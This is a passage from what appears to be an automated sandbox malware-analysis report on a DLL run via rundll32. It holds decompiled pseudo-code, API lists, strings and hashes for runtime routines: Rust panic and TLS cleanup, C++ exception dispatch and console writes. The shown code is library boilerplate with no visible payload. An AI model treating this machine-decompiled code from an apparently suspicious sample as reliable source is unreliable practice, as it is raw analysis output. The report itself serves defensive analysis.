											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6ECCDD30;
											_v52 =  &_v124;
											_v48 = 1;
											_t225 = E6ECCD0F0( &_v92, __eflags);
											_t341 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6ed1e10c);
											__eflags = _t225 - 3;
											if(__eflags != 0) {
												goto L95;
											}
											_v20 = 5;
											_v40 = _t341;
											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
											_t348 = _t348 + 4;
											goto L90;
										} else {
											if(_t222 == 1) {
												L95:
												_t372 = _v36;
												if(_t372 != 0) {
													asm("lock dec dword [eax]");
													if(_t372 == 0) {
														E6ECCC640(_v84);
													}
												}
												_t342 = _v140;
												_t338 = _v136;
												_t373 = _v72;
												if(_t373 != 0) {
													asm("lock dec dword [eax]");
													if(_t373 == 0) {
														E6ECCDA70(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6ed1e11c);
												_t374 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6ed1029c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6ed0f570;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t229 = E6ECCD0F0( &_v80, _t374);
													_v120 =  &_v68;
													_v124 = _t229;
													E6ECCD2B0( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t285 = _t338;
												E6ECCD290(_t285, _t342);
												asm("ud2");
												goto L104;
											}
											 *0x6ed1d040 = 0;
											_t368 =  *0x6ed1d040;
											if( *0x6ed1d040 == 0) {
												goto L95;
											}
											_t330 =  &_v68;
											_v68 = 0x6ed1017c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6ed0f570;
											_v48 = 0;
											_v20 = 3;
											if(E6ECCD0F0( &_v92, _t368) != 3) {
												goto L95;
											}
											_v40 = _t330;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
											_t348 = _t348 + 4;
											L90:
											_t296 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t296 + 4)) != 0) {
												_t238 =  *_v40;
												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
													_t238 =  *(_t238 - 4);
												}
												HeapFree( *0x6ed1e128, 0, _t238);
											}
											HeapFree( *0x6ed1e128, 0, _v40);
											goto L95;
										}
									}
									_t213 = 0;
									goto L105;
								}
								_t213 = 0;
								goto L48;
							}
						}
					}
				}
			}

APIs

Part of subcall function 6ECCC700: AcquireSRWLockShared.KERNEL32(6ED1E11C), ref: 6ECCC785

HeapFree.KERNEL32(00000000,00000000), ref: 6ECCC8DC
HeapFree.KERNEL32(00000000,?), ref: 6ECCC8EA
TlsGetValue.KERNEL32(00000000), ref: 6ECCC94D
HeapFree.KERNEL32(00000000,00000000), ref: 6ECCCB31
HeapFree.KERNEL32(00000000,?), ref: 6ECCCB3F

Strings

Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6ECCCC00
cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6ECCC74D, 6ECCC7C8

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: FreeHeap$AcquireLockSharedValue
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa
API String ID: 942675266-716947571
Opcode ID: 9de5f66f8793e648fc0e54e4cf271706549a221635fe8a8b286590f87f6895db
Instruction ID: 65d8dec711584d7bbdf26eb043d044f6b7e12fe16b604b5eb3c4aa6d1f40fc34
Opcode Fuzzy Hash: 9de5f66f8793e648fc0e54e4cf271706549a221635fe8a8b286590f87f6895db
Instruction Fuzzy Hash: 050214B0E002198FEB10CFE4C954BDEBBB5BF49704F208559D815AB384E775A986CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6ECDF6F6, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E6ECDF6F6(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6ECE0658(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6ECE1C23(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6ECDF3B1(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6ECDF3B1(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6ECDEBF7(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6ECDEB2A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6ECDF676(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6ECE1C23(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6ECDF3B1(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6ECDF3B1(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6ECDF3B1(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6ECDF3B1(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6ECDEB2A(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6ECDF676(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6ECDF131(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6ECDF3B1(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6ECE0105(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6ECDF3B1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6ECDF3B1(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6ECDF3B1(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6ECDF3B1(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6ECE0105(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6ECE1BCC(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6ECDFD99( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6ed1e0c0) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6ECDF131(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6ECDFD81( &_v64);
											E6ECDE95C( &_v64, 0x6ed1b17c);
											L63:
											 *(E6ECDF3B1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6ECDF3B1(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6ECDED1D(_t279, _t319, _t274);
											E6ECE0005(_a8, _a16, _t305);
											_t235 = E6ECE01C2(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6ECDFF7C(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6ECDF7F3
type_info::operator==.LIBVCRUNTIME ref: 6ECDF815
___TypeMatch.LIBVCRUNTIME ref: 6ECDF924
IsInExceptionSpec.LIBVCRUNTIME ref: 6ECDF9F6
_UnwindNestedFrames.LIBCMT ref: 6ECDFA7A
CallUnexpected.LIBVCRUNTIME ref: 6ECDFA95

Strings

csm, xrefs: 6ECDF733
csm, xrefs: 6ECDF84C
csm, xrefs: 6ECDF7A0

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 6b83ebf2a301ef97858b9de953cb718f4bb8e379d1e048fc688a96df8fa8d150
Instruction ID: 90327d15834b4337df600115f6f20db28ab2dbf03372a606a32c8f3d07b363e9
Opcode Fuzzy Hash: 6b83ebf2a301ef97858b9de953cb718f4bb8e379d1e048fc688a96df8fa8d150
Instruction Fuzzy Hash: 90B17C31C0028AEFCF05CFE4C8909DEB7B9FF04314B25455AEA146B219E732DA69CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6ECCC340, Relevance: 12.6, APIs: 10, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E6ECCC340() {
				intOrPtr _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				signed char _t42;
				signed char _t43;
				signed char _t44;
				signed char _t45;
				intOrPtr* _t52;
				intOrPtr* _t53;
				intOrPtr* _t54;
				intOrPtr* _t55;
				intOrPtr* _t56;
				void* _t57;

				_t25 =  *((intOrPtr*)(_t57 + 0x18));
				if(_t25 == 3 || _t25 == 0) {
					_t52 =  *0x6ed1e12c; // 0x0
					if(_t52 == 0) {
						goto L26;
					}
					_t42 = 0;
					do {
						_t27 = TlsGetValue( *(_t52 + 4));
						if(_t27 != 0) {
							TlsSetValue( *(_t52 + 4), 0);
							 *_t52(_t27);
							_t57 = _t57 + 4;
							_t42 = 1;
						}
						_t52 =  *((intOrPtr*)(_t52 + 8));
					} while (_t52 != 0);
					if((_t42 & 0x00000001) == 0) {
						goto L26;
					}
					_t53 =  *0x6ed1e12c; // 0x0
					if(_t53 == 0) {
						goto L26;
					}
					_t43 = 0;
					do {
						_t28 = TlsGetValue( *(_t53 + 4));
						if(_t28 != 0) {
							TlsSetValue( *(_t53 + 4), 0);
							 *_t53(_t28);
							_t57 = _t57 + 4;
							_t43 = 1;
						}
						_t53 =  *((intOrPtr*)(_t53 + 8));
					} while (_t53 != 0);
					if((_t43 & 0x00000001) == 0) {
						goto L26;
					}
					_t54 =  *0x6ed1e12c; // 0x0
					if(_t54 == 0) {
						goto L26;
					}
					_t44 = 0;
					do {
						_t29 = TlsGetValue( *(_t54 + 4));
						if(_t29 != 0) {
							TlsSetValue( *(_t54 + 4), 0);
							 *_t54(_t29);
							_t57 = _t57 + 4;
							_t44 = 1;
						}
						_t54 =  *((intOrPtr*)(_t54 + 8));
					} while (_t54 != 0);
					if((_t44 & 0x00000001) == 0) {
						goto L26;
					}
					_t55 =  *0x6ed1e12c; // 0x0
					if(_t55 == 0) {
						goto L26;
					}
					_t45 = 0;
					do {
						_t30 = TlsGetValue( *(_t55 + 4));
						if(_t30 != 0) {
							TlsSetValue( *(_t55 + 4), 0);
							 *_t55(_t30);
							_t57 = _t57 + 4;
							_t45 = 1;
						}
						_t55 =  *((intOrPtr*)(_t55 + 8));
					} while (_t55 != 0);
					if((_t45 & 0x00000001) != 0) {
						_t56 =  *0x6ed1e12c; // 0x0
						while(_t56 != 0) {
							_t31 = TlsGetValue( *(_t56 + 4));
							if(_t31 != 0) {
								TlsSetValue( *(_t56 + 4), 0);
								 *_t56(_t31);
								_t57 = _t57 + 4;
							}
							_t56 =  *((intOrPtr*)(_t56 + 8));
						}
					}
					goto L26;
				} else {
					L26:
					_t26 =  *0x6ed1a300; // 0x70
					return _t26;
				}
			}

APIs

TlsGetValue.KERNEL32(?), ref: 6ECCC37A
TlsSetValue.KERNEL32(?,00000000), ref: 6ECCC387
TlsGetValue.KERNEL32(?), ref: 6ECCC3CA
TlsSetValue.KERNEL32(?,00000000), ref: 6ECCC3D7
TlsGetValue.KERNEL32(?), ref: 6ECCC40A
TlsSetValue.KERNEL32(?,00000000), ref: 6ECCC417
TlsGetValue.KERNEL32(?), ref: 6ECCC44A
TlsSetValue.KERNEL32(?,00000000), ref: 6ECCC457
TlsGetValue.KERNEL32(?), ref: 6ECCC48B
TlsSetValue.KERNEL32(?,00000000), ref: 6ECCC498

Memory Dump Source

Source File: 00000004.00000002.547037446.000000006ECC1000.00000020.00020000.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000004.00000002.547034552.000000006ECC0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547059831.000000006ECEA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.547078261.000000006ED1D000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.547082004.000000006ED1F000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.547085428.000000006ED20000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6ecc0000_rundll32.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 46438d9506b83ca277d5ef0db6585b971bb1f636982df3c308e047d7e4602273
Instruction ID: 8abc2a03e81ac51a85d32ae86b432406f72cb9cfc7fc5f56d9450629f1462e85
Opcode Fuzzy Hash: 46438d9506b83ca277d5ef0db6585b971bb1f636982df3c308e047d7e4602273
Instruction Fuzzy Hash: 78417F32144249EFDB50EFE59D12FFA3724AF12E41F048024EE254E259F761DA22DB93

Uniqueness

Uniqueness Score: -1.00%

Function 6ECD1BF0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212
fileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E6ECD1BF0(void* __ebx, struct _OVERLAPPED** __ecx, void* __edx, void* __edi, void* __ebp, signed char _a4, signed char* _a8) {
				char _v20;
				void* _v24;
				char _v44;
				long _v48;
				void* _v52;
				signed int _v56;
				char _v60;
				void* __esi;
				long _t57;
				void* _t58;
				long _t60;
				signed int _t61;
				long _t81;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t91;
				char _t93;
				void* _t96;
				void* _t97;
				signed int _t100;
				signed int _t101;
				struct _OVERLAPPED* _t102;
				signed int _t105;
				signed int* _t106;
				signed int _t110;
				signed char _t112;
				void* _t114;
				long _t118;
				void** _t119;
				void* _t120;
				long _t122;
				void* _t125;
				void* _t133;
				struct _OVERLAPPED** _t135;
				void* _t144;
				long _t152;
				signed char* _t155;
				DWORD* _t156;
				void* _t157;
				void** _t158;
				void** _t160;

				_push(__ebp);
				_push(__ebx);
				_push(__edi);
				_t158 = _t157 - 0x30;
				_t152 = _a4;
				_t135 = __ecx;
				if(_t152 == 0) {
					 *(__ecx + 4) = 0;
					goto L5;
				} else {
					_t96 = __edx;
					_t58 = GetStdHandle(0xfffffff4);
					if(_t58 == 0) {
						_t57 = 6;
						goto L7;
					} else {
						_t133 = _t58;
						if(_t58 != 0xffffffff) {
							_v48 = 0;
							_t60 = GetConsoleMode(_t133,  &_v48);
							__eflags = _t60;
							if(_t60 == 0) {
								__eflags = _t133;
								if(__eflags == 0) {
									goto L42;
								} else {
									_v48 = 0;
									_t81 = WriteFile(_t133, _t96, _t152,  &_v48, 0);
									__eflags = _t81;
									if(_t81 == 0) {
										_t57 = GetLastError();
										_t102 = 0;
										__eflags = 0;
										_t122 = 1;
									} else {
										_t102 = _v48;
										_t57 = 0;
										_t122 = 0;
									}
									 *_t135 = _t122;
									_t135[1] = _t102;
									_t135[2] = _t57;
									goto L9;
								}
							} else {
								_t57 = _a8[4] & 0x000000ff;
								__eflags = _t57;
								if(_t57 == 0) {
									__eflags = _t152 - 0x1000;
									_t84 =  <  ? _t152 : 0x1000;
									_push( <  ? _t152 : 0x1000);
									E6ECC3650( &_v60, _t96);
									_t158 =  &(_t158[1]);
									__eflags = _v60 - 1;
									if(_v60 != 1) {
										_t86 = _v56;
										_t97 = _v52;
										goto L28;
									} else {
										__eflags = _v56;
										if(_v56 == 0) {
											_t87 =  *_t96 & 0x000000ff;
											_t38 = _t87 + 0x6ed0f570; // 0x1010101
											_t105 =  *_t38 & 0x000000ff;
											__eflags = _t105 - 2;
											if(_t105 < 2) {
												L39:
												_t135[2] = 0x6ed108cc;
												_t135[1] = 0x1502;
												goto L40;
											} else {
												__eflags = _t105 - _t152;
												if(_t105 <= _t152) {
													goto L39;
												} else {
													_t106 = _a8;
													 *_t106 = _t87;
													_t106[1] = 1;
													goto L38;
												}
											}
											goto L9;
										} else {
											_t88 = _v56;
											__eflags = _t88 - _t152;
											if(__eflags > 0) {
												_t100 = _t88;
												_t118 = _t152;
												_push(0x6ed10904);
												goto L45;
											} else {
												_t125 = _t96;
												_push(_t88);
												E6ECC3650( &_v48, _t125);
